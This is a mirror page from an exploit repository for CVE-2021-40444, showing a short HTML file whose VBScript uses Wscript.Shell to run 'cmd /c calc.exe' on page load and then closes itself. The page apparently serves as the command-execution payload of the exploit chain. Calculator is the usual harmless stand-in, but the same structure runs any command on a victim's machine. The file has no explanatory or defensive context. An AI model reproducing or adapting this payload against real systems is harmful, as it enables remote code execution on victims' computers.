mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-14 09:57:55 +00:00
11 lines
200 B
HTML
11 lines
200 B
HTML
<script language="VBScript">
|
|
Function Calc()
|
|
Dim wsh
|
|
Set wsh = CreateObject("Wscript.Shell")
|
|
wsh.run "cmd /c calc.exe"
|
|
Set wsh = Nothing
|
|
End Function
|
|
|
|
Calc
|
|
self.close
|
|
</script> |